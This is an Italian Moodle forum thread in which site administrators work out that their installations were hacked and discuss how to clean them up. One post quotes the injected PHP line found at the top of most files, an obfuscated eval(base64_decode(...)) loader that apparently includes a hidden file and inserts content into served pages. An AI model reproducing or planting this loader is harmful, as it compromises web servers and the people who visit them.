anche io pagine bianche......

anche io pagine bianche......

di mauro mascia -
Numero di risposte: 13
ciao a tutti

mi sta accadendo che di punto in bianco,apparentemente senza aver cambiato nulla,quando cerco di aggiornare,spostare,nascondere o cancellare una risorsa,ottengo una pagina bianca senza neanche codice html.ho notato che invece funziona quando la risorsa da editare non fa parte di una pagina settimanale.
per spiegarmi meglio,se il link è:

http://XXXXXX.XXX/course/mod.php?copy=1395&sesskey=F6rgyTuRN0&sr=3

ovvero con il 3 in fondo,ebbene non funziona.ma se sostituisco il 3 con uno 0 riesco ad accedere a tutte le funzioni della risorsa,cosi come non ho problemi sela risorsa contiene già lo 0.

ribadisco che non è stato cambiato nulla rispetto a quando funzionava,php ha safe mode disattivato,ho provato a ricaricare la cartella course,ma nulla.

la versione è 1.8.3

grazie.....
Media dei voti:  -
In riposta a mauro mascia

Re: anche io pagine bianche......

di Natalia Visalli -
questo delle pagine bianche e un'altro degli acciacchi che ha colpito il mio "moodle" in questi ultimi giorni:

1) editor HTML scomparso

2) backup che non funziona

3) pagine bianche

e nel config che ho ripulito compare di nuovo una stringa estranea.......
Lo stessa che c'è nel lib.php di course e di backup

triste


In riposta a Natalia Visalli

Re: anche io pagine bianche......

di mauro mascia -
ho trovato questo nel sito in inglese.ilproblema è esattamente uguale al mio.dicono che si tratta di un hackeraggio......sad

http://moodle.org/mod/forum/discuss.php?d=112899
In riposta a mauro mascia

Re: anche io pagine bianche......

di mauro mascia -
eh si..sono stato hackerato...
in pratica quasi tutti i file hanno come prima riga un bel:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZTcxYS9zdWIwMDUvc2M0MTA5MS1ZQUVOL2lsdGtvbmxpbmUub3JnL2Jsb2Nrcy9hZG1pbl90cmVlL2lud2ljYXN0L2xhbmcvZW5fdXRmOC9oZWxwL2Jsb2NrX2lud2ljYXN0L21kbF91dGYucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWU3MWEvc3ViMDA1L3NjNDEwOTEtWUFFTi9pbHRrb25saW5lLm9yZy9ibG9ja3MvYWRtaW5fdHJlZS9pbndpY2FzdC9sYW5nL2VuX3V0ZjgvaGVscC9ibG9ja19pbndpY2FzdC9tZGxfdXRmLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRkKXskZj1vcmQoc3Vic3RyKCRkLDMsMSkpOyRoPTEwOyRlPTA7aWYoJGYmNCl7JGU9dW5wYWNrKCd2JyxzdWJzdHIoJGQsMTAsMikpOyRlPSRlWzFdOyRoKz0yKyRlO31pZigkZiY4KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYxNil7JGg9c3RycG9zKCRkLGNocigwKSwkaCkrMTt9aWYoJGYmMil7JGgrPTI7fSR1PWd6aW5mbGF0ZShzdWJzdHIoJGQsJGgpKTtpZigkdT09PUZBTFNFKXskdT0kZDt9cmV0dXJuICR1O319ZnVuY3Rpb24gZGdvYmgoJGIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRjPWd6ZGVjb2RlKCRiKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkYykpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRjKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJGM7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>

inoltre i permessi sono tutti 777
avete soluzioni/consigli?






In riposta a mauro mascia

L'intervento è stato rimosso

Il contenuto di questo forum è stato rimosso e non può più essere visualizzato.
In riposta a Utente eliminato

Re: anche io pagine bianche......

di Tiziana Armano -
Ciao,
purtroppo è successo anche a me su tutte le istanze che avevo sul server anche se di diverse versioni. Ho trovato parecchi file hackerati in lib oltre ai vari config.php, version.php. Alla fine ho fatto l'upgrade di tutte le istanze. Non capisco però se è una vulnerabilità di Moodle o del server . Che fare per evitare altre intrusioni?
In riposta a Tiziana Armano

Re: anche io pagine bianche......

di mauro mascia -
qui entriamo nel discorso di quale provider sia meglio... io ho alcuni siti su aruba e non ho avuto grossi problemi di sicurezza,a parte qualche volta.Purtroppo con aruba non sono riuscito a fare andare moodle per l'assenza di alcune librerie (GD),forse perchè ho un hosting windows.
Attualmente il mio sito moodle è su un provider tedesco che si chiama servage.net;molto professionali e veloci nel rispondere ai ticket,ottimo supporto di librerie,ecc , ma scarsi,a quanto sembra,in sicurezza.Infatti oltre a questa volta ho avuto altri attacchi su altri siti su questo provider.

in ogni caso è importante aggiornare periodicamente gli accessi all'ftp e al pannello di controllo del dominio settare correttamente i permessi alle cartelle e sfruttare le possibilità di sicurezza del provider.Per esempio ora ho visto che servage dà la possibiità di filtrare gli accessi in base all'ip o alla zona geografica; ho settato subito questa opzione permettendo l'accesso solo dall'Italia,anche se dubito della reale efficacia di questo filtro,visto che immagino basti usare un proxy italiano per accedere....
In riposta a Tiziana Armano

Re: anche io pagine bianche......

di mauro mascia -
scusa,ma cosa intendi per "fare l'upgrade di tutte le istanze"? te lo chiedo perchè vorrei sostituire i files e le cartelle con una versione "vergine" senza dover reinstallare tutto, ma non trovo tra le releases disponibili quella di cui ho bisogno (la 1.8.3 + ).

e se facessi una operazione di upgrade risolvo il problema secondo voi?

In riposta a mauro mascia

Re: anche io pagine bianche......

di Alberto Vasciaveo -
Io ho fatto proprio così!
Ho approfittato della necessità di aggiornare la mia versione dalla 1.9+ alla 1.94+ e ... ho risolto!
Ho praticamente fatto il backup del DB + il backup di ogni corso + la copia di tutte le cartelle di installazione (non si sa mai!) e poi ho ricoperto tutti i file con i nuovi.
Adesso mi sono riappropriato della modifica delle attività e delle risorse all'interno dei corsi!!
Prima avevo sempre pagina bianca, adesso invece sembra essere tutto a posto (almeno finora!).
Certo è che non ho ancora capito cosa sia realmente successo.
E' certamente lungo, ma almeno ho risolto!

In riposta a Alberto Vasciaveo

Re: anche io pagine bianche......

di Natalia Visalli -
Io invece ho recuperato i file della vecchia installazione e li ho sostituiti.

Poi ho "ripulito a mano" i file di moodledata.

Funziona quasi tutto, solo non si vedono le immagini che sono caricate in moodledata.

Ma io non sò più cosa cancellare triste

Natalia
In riposta a Natalia Visalli

Re: anche io pagine bianche......

di Natalia Visalli -
C'era ancora qualche cosa da cancellare....... gli spazi nel config.php

Ora funziona tutto grande sorriso

Natalia
In riposta a Natalia Visalli

Re: anche io pagine bianche......

di Alberto Vasciaveo -
Come ho indicato in una precedente risposta, ho aggiornato la versione alla 1.94+ ed è ritornato funzionante (sparite le "pagine bianche").
Mi sono accorto però che in diverse pagine (specie quelle amministrative) compaiono diversi errori.
Per esempio, richiedendo la lista degli utenti compare per tre volte "
Notice: Undefined index: it in /web/htdocs/www.miosito.it/home/el2/admin/user.php on line 189"
E poi altri errori in altre pagine, come per esempio nella esecuzione dei Quiz, dove a volte viene un errore (a volte si a volte no) spostandosi da un quesito ad un altro.
Ho anche verificato se vi fossero spazi nel config, ed effettivamente ce ne sono tra i diversi parametri, ma alla fine del file viene specificato di controllare che non ve ne siano in fondo, alla fine del file stesso (ed infatti non ce ne sono!).
Mi chiedevo quali "pulizie" hai fatto nella cartella MoodleData, perchè non riesco a ristabilire una buona funzionalità.
Grazie
In riposta a Alberto Vasciaveo

Re: anche io pagine bianche......

di mauro mascia -
Non voglio fare allarmismi,ma dopo avere esamitato un pò più a fondo la parte dello script ci è stata aggiunta dopo l'operazione di hackering (quella che contiene il codice base 64) , ci siamo accorti che conteneva delle istruzioni per fare uno streaming. perciò ci siamo allarmati pensando che ci stessero usando come ponte per qualche trasmissione illegale e abbiamo deciso di sporgere denuncia,più che altro per tutelarci nel caso ci fossero problemi in futuro.